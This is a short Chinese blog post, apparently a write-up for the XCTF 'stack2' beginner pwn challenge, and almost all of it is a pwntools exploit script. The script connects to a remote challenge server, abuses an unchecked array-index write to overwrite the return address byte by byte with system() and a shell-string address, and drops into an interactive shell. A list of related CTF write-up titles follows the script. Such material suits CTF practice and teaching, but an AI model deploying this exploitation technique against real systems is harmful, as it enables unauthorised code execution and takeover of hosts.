9.pwn入门新手练习攻防世界stack2 低位读取内存
2020-03-09 23:39
543 查看
参考文章
https://blog.csdn.net/qq_43681242/article/details/104077461
exp
#!/usr/bin/env python #coding:utf-8 from pwn import * #p = process('./stack2') p = remote('111.198.29.45',58596) system_addr = 0x08048450 bish_addr = 0x08048987 leave_offset = 0x84 def write_adrr(addr,va): p.sendline('3') p.recvuntil('which number to change:\n') p.sendline(str(addr)) p.recvuntil('new number:\n') p.sendline(str(va)) p.recvuntil('5. exit\n') p.sendlineafter('How many numbers you have:\n','1') p.sendlineafter('Give me your numbers\n','2') p.recvuntil('5. exit\n') write_adrr(leave_offset,0x50) write_adrr(leave_offset+1,0x84) write_adrr(leave_offset+2,0x04) write_adrr(leave_offset+3,0x08) leave_offset +=8 write_adrr(leave_offset,0x87) write_adrr(leave_offset+1,0x89) write_adrr(leave_offset+2,0x04) write_adrr(leave_offset+3,0x08) p.sendline('5') p.interactive()
- 点赞 2
- 收藏
- 分享
- 文章举报
相关文章推荐
- 攻防世界MISC新手练习区base64stego
- 攻防世界MISC新手练习区SimpleRAR
- 攻防世界MISC新手练习区掀桌子
- 攻防世界-WEB新手练习篇
- CTF攻防世界 WEB方向 新手练习区 题解
- xctf攻防世界—Web新手练习区 writeup
- XCTF攻防世界web新手练习_ 4_disabled_button
- XCTF攻防世界web新手练习_ 10_simple_php
- 攻防世界MISC新手练习区gif
- XCTF攻防世界web新手练习_ 7_weak_auth
- 攻防世界MISC新手练习区坚持60s
- 攻防世界MISC新手练习区give_you_flag
- 攻防世界MISC新手练习区pdf
- XCTF 攻防世界 web 新手练习
- 攻防世界题目练习--MISC新手关(1~6)
- XCTF攻防世界web新手练习_ 2_backup
- XCTF攻防世界web新手练习_ 5_simple_js
- 攻防世界MISC新手练习区this_is_flag
- 攻防世界(Xctf)web题新手练习区writeup
- 攻防世界MISC新手练习区功夫再高也怕菜刀